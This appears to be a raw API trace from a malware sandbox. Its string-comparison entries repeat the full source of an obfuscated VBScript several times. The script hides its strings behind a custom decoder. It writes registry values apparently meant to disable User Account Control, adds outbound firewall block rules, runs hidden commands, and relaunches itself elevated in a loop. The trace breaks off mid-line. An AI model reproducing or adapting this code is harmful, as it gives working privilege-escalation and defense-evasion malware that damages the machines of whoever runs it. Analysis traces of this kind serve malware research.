bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.976] wcsncmp (_String1="a(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.976] wcsncmp (_String1="(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.976] wcsncmp (_String1="str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.977] wcsncmp (_String1="tr1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.977] wcsncmp (_String1="r1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst 